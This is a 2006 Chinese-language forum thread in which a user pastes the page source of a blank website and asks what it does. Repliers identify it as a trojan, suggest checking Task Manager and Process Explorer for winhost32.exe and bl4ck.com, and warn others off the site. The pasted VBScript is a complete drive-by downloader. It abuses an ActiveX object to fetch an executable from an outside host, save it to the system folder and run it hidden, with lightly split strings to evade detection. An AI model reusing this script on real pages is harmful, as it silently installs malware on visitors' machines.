我在一個網站上發現的代碼,哪位大狹看看是做什麽的

打開那個網站後,什麽也顯示沒有,查看源代碼,如下:感覺不是好東西。哪為大狹給解釋一下,我是否已經中大獎了?
var Words="





on error resume next
dl = "http://superlone.my.phome.cn/tools2/winhost32.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("ing.FileSystemObject","")
set temp = F.GetSpecialFolder(1)
fname1= F.BuildPath(temp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
>


所有跟帖: 

俺感覺這象一個木馬,誰能告訴俺是什麽馬?怎麽去掉? -均萎主席- 給 均萎主席 發送悄悄話 (0 bytes) () 09/03/2006 postreply 19:11:27

恭喜,中獎了。看task manager有沒有winhost32.exe和bl4ck.com -牧風- 給 牧風 發送悄悄話 牧風 的博客首頁 (0 bytes) () 09/03/2006 postreply 20:34:10

用process explorer看有沒有程序連著winhost32.exe和bl4ck.com -牧風- 給 牧風 發送悄悄話 牧風 的博客首頁 (0 bytes) () 09/03/2006 postreply 21:46:49

沒看見那倆程序名,process explorer在哪兒? -均萎主席- 給 均萎主席 發送悄悄話 (0 bytes) () 09/04/2006 postreply 05:46:28

多謝幫助! -均萎主席- 給 均萎主席 發送悄悄話 (0 bytes) () 09/04/2006 postreply 05:58:41

那個有病毒的網站是superlone.my.phome.cn,各位小心! -均萎主席- 給 均萎主席 發送悄悄話 (0 bytes) () 09/04/2006 postreply 05:59:41

請您先登陸,再發跟帖!